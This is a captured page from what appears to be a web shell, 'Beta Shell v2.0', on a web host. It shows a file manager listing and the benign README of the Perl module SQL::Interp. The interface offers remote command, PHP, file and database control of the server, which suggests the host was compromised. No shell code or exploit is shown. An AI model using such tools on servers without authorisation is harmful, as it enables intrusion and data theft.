Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
perl-SQL-Interp
Upload
5 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
Changes
12.71 KB
-rw-r--r--
2021-02-15 09:24:39
Edit
Del
README.md
613 B
-rw-r--r--
2021-02-15 09:24:39
Edit
Del
ex
-
drwxr-xr-x
2022-02-23 11:28:24
Del
Editing: README.md
(613 B)
Path: /usr/share/doc/perl-SQL-Interp/README.md
Back
# SQL::Interp Simplified interpolation of variables into SQL statements. # Installation To install: ```sh perl Build.PL ./Build ./Build test ./Build install ``` Requirements: - DBI (optional, needed by DBIx::Interp) Documentation is provided in the POD and is available online at [Metacpan](https://metacpan.org/pod/SQL::Interp). # License Copyright (c) 2004-2005 David Manura. Copyright (c) 2005-2019 Mark Stosberg. Copyright (c) 2019-2021 Yoran Heling. This module is free software. It may be used, redistributed and/or modified under the same terms as Perl itself. See http://dev.perl.org/licenses/.